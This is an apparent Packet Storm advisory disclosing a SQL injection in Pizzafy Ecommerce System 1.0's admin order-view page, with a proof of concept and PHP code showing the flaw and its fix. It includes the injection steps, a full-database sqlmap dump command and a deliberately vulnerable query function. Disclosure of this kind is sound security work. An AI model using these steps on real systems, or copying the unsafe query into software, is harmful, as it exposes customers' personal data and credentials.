PACKETSTORM

Pizzafy Ecommerce System 1.0 SQL Injection (PACKETSTORM:220076)

Description

The `admin/view_order.php` endpoint in Pizzafy Ecommerce System version 1.0 fails to properly sanitize the `id` GET parameter before passing it to a MySQL query. An authenticated administrator can manipulate this parameter to inject arbitrary SQL, leading...

Basic Information

ID PACKETSTORM:220076
Published Apr 29, 2026 at 00:00

Affected Product
Pizzafy Ecommerce System

Affected Versions
1.0

# SQL Injection in Pizzafy Ecommerce System — `admin/view_order.php`

## Details

| Field | Value |
|---|---|
| **Vendor** | SourceCodester |
| **Product** | Pizzafy Ecommerce System using PHP and MySQL |
| **Version** | 1.0 |
| **Vulnerability** | SQL Injection |
| **CWE** | CWE-89 |
| **CVSSv3 Score** | 7.2 (High) |
| **Attack Vector** | Network |
| **Auth Required** | Yes (Administrator) |
| **Researcher** | Xmyronn |
| **Date** | 2026-04-11 |

https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html

---

## Affected Component

**File:** `Pizzafy/admin/view_order.php`
**Parameter:** `id` (GET)

---

## Description

The `admin/view_order.php` endpoint in Pizzafy Ecommerce System 1.0 fails to properly sanitize the `id` GET parameter before passing it to a MySQL query. An authenticated administrator can manipulate this parameter to inject arbitrary SQL, leading to full database compromise.
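To make the defect and its fix concrete, here is an added illustration in PHP (not the Pizzafy source, which is not reproduced in this advisory): a hypothetical `view_order` handler showing the string-concatenation pattern the description refers to beside a hardened version using a validated integer, a prepared statement, and server-side-only error reporting. It assumes a mysqli connection `$conn` and an `orders` table with an integer `id` column; the connection credentials are placeholders.

```php
<?php
// Added illustration, not the Pizzafy source. Assumes a mysqli connection and
// an `orders` table with an integer `id` column; credentials are placeholders.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$conn = new mysqli('localhost', 'pizzafy_ro', 'password-placeholder', 'pizzafy');

// Unsafe pattern: the raw GET value is spliced into the SQL text. A stray
// quote in `id` breaks the statement (the error page shown below in the
// advisory), and a crafted value changes the query's meaning.
function view_order_unsafe(mysqli $conn, array $get): ?array
{
    $id  = $get['id'] ?? '';                       // no validation, no quoting
    $sql = "SELECT * FROM orders WHERE id = '" . $id . "'";
    return $conn->query($sql)->fetch_assoc();
}

// Hardened form: validate the type, bind the value, never echo driver errors.
function view_order_safe(mysqli $conn, array $get): ?array
{
    // 1. Type check: an order id must be a positive integer, nothing else.
    $id = filter_var($get['id'] ?? null, FILTER_VALIDATE_INT,
                     ['options' => ['min_range' => 1]]);
    if ($id === false) {
        http_response_code(400);
        return null;
    }
    try {
        // 2. Prepared statement: the value is sent separately from the SQL text,
        //    so it can never be parsed as part of the statement.
        $stmt = $conn->prepare('SELECT * FROM orders WHERE id = ?');
        $stmt->bind_param('i', $id);
        $stmt->execute();
        $row = $stmt->get_result()->fetch_assoc();
        return $row ?: null;
    } catch (mysqli_sql_exception $e) {
        // 3. Keep the driver message server-side. Leaving the exception uncaught
        //    with display_errors on produces the verbose fatal-error page.
        error_log('view_order query failed: ' . $e->getMessage());
        http_response_code(500);
        return null;
    }
}

$order = view_order_safe($conn, $_GET);
if ($order === null) {
    exit('Order not found or invalid request.');
}
echo htmlspecialchars(json_encode($order), ENT_QUOTES, 'UTF-8');
```

Note that `view_order_unsafe` is kept only to show the contrast; with `MYSQLI_REPORT_STRICT` enabled it throws `mysqli_sql_exception` on malformed input exactly as the reported error page does.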

---

## Proof of Concept

### Step 1 — Login as Administrator

Navigate to:
```
http://localhost/pizzafy/Pizzafy/admin/index.php
```
Login with admin credentials.

### Step 2 — Navigate to Orders

```
http://localhost/pizzafy/Pizzafy/admin/index.php?page=orders
```

Click **View Order** on any order entry.

### Step 3 — Intercept Request in Burp Suite

The intercepted request is a plain GET to `admin/view_order.php` carrying the order number in the `id` parameter (`id=1` for the first order).

### Step 4 — Trigger SQL Error

Modify `id=1` to `id='`:

```
GET /pizzafy/Pizzafy/admin/view_order.php?id=' HTTP/1.1
```

**Response — MySQL error exposed:**

```
Fatal error: Uncaught mysqli_sql_exception: You have an error in your SQL syntax;
check the manual that corresponds to your MariaDB server version for the right
syntax to use near ''' at line 1 in
C:\xampp\htdocs\pizzafy\Pizzafy\admin\view_order.php:15
```

### Step 5 — Exploit with sqlmap

Save the request to `view_order.txt` and run:

```bash
sqlmap -r view_order.txt --dump --batch
```

**sqlmap confirmed injection types:**

| Type | Title |
|---|---|
| Boolean-based blind | AND boolean-based blind — WHERE clause |
| Error-based | MySQL >= 5.0 FLOOR error-based |
| Time-based blind | MySQL >= 5.0.12 SLEEP |
| UNION query | Generic UNION query — 11 columns |

**Full database dumped:**

```
Database: pizzafy
Tables: users, user_info, orders, order_list, product_list, category_list, system_settings
```

Sensitive data exposed includes bcrypt password hashes, customer emails, order details, and system configuration.

---

## Impact

A malicious authenticated administrator (or attacker who has obtained admin credentials) can:
- Dump the full database including password hashes
- Read sensitive customer PII (names, emails, addresses, phone numbers)
- Potentially write to the database

---

## References

- [SourceCodester — Pizzafy Ecommerce System](https://www.sourcecodester.com/php/18708/pizzafy-ecommerce-system.html)
- CWE-89: Improper Neutralization of Special Elements used in an SQL Command.
